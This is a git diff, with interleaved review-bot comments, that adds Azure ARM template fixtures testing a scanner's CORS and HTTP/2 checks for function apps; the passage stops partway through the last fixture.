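Review bot: The resource under test is `Microsoft.Web/sites` with no `kind`, so fail.json, pass.json and pass_with_cors.json describe a plain web app rather than a function app; if the FunctionAppDisallowCORS check filters on `kind`, none of the three fixtures would reach its evaluation logic, and if it does not, the check name overstates its scope. Adding `"kind": "functionapp",` after `"type": "Microsoft.Web/sites",` in all three fixtures makes the intent unambiguous either way. The check source is outside this diff, so this is inferred from the fixture shape.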
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json
new file mode 100644
index 00000000000..d4db5386dc0
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json
@@ -0,0 +1,56 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "siteName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Web App."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure region where the resource should be deployed."
+ }
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "Free",
+ "allowedValues": [
+ "Free",
+ "Shared",
+ "Basic",
+ "Standard",
+ "Premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of the Azure Web App."
+ }
+ },
+ "appServicePlanName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the App Service Plan to use."
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2019-08-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "properties": {
+ "name": "[parameters('siteName')]",
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+ ],
+ "sku": {
+ "name": "[parameters('sku')]"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json
new file mode 100644
index 00000000000..89588498bbb
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json
@@ -0,0 +1,81 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "siteName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Web App."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure region where the resource should be deployed."
+ }
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "Free",
+ "allowedValues": [
+ "Free",
+ "Shared",
+ "Basic",
+ "Standard",
+ "Premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of the Azure Web App."
+ }
+ },
+ "appServicePlanName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the App Service Plan to use."
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2019-08-01",
+ "name": "pass_with_cors",
+ "location": "[parameters('location')]",
+ "properties": {
+ "name": "[parameters('siteName')]",
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]",
+ "siteConfig": {
+ "appSettings": [
+ {
+ "name": "Setting1",
+ "value": "Value1"
+ },
+ {
+ "name": "Setting2",
+ "value": "Value2"
+ }
+ ],
+ "metadata": [
+ {
+ "name": "Key1",
+ "value": "Value1"
+ },
+ {
+ "name": "Key2",
+ "value": "Value2"
+ }
+ ],
+ "cors": {
+ "allowedOrigins": ["192.0.0.1"]
+ }
+ }
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+ ],
+ "sku": {
+ "name": "[parameters('sku')]"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json
new file mode 100644
index 00000000000..fda341efc0e
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json
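Review bot: `"allowedOrigins": ["192.0.0.1"]` is not a well-formed CORS origin — an origin is scheme plus host and optional port — so the pass fixture exercises the non-wildcard branch with a value that App Service would never match against a real request's Origin header. Using `"allowedOrigins": ["https://example.com"]` keeps the test's meaning (an explicit, non-`*` entry) while matching the documented format, and avoids the fixture being read as an example of a valid configuration.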
@@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + 
"exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": 
"string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json new file mode 100644 index 00000000000..64592e64706 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json 
@@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": 
"string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + 
"vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json new file mode 100644 index 00000000000..69b2c86f385 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json 
@@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + 
"exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": 
"string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json new file mode 100644 index 00000000000..0871576b6cc --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json 
@@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + 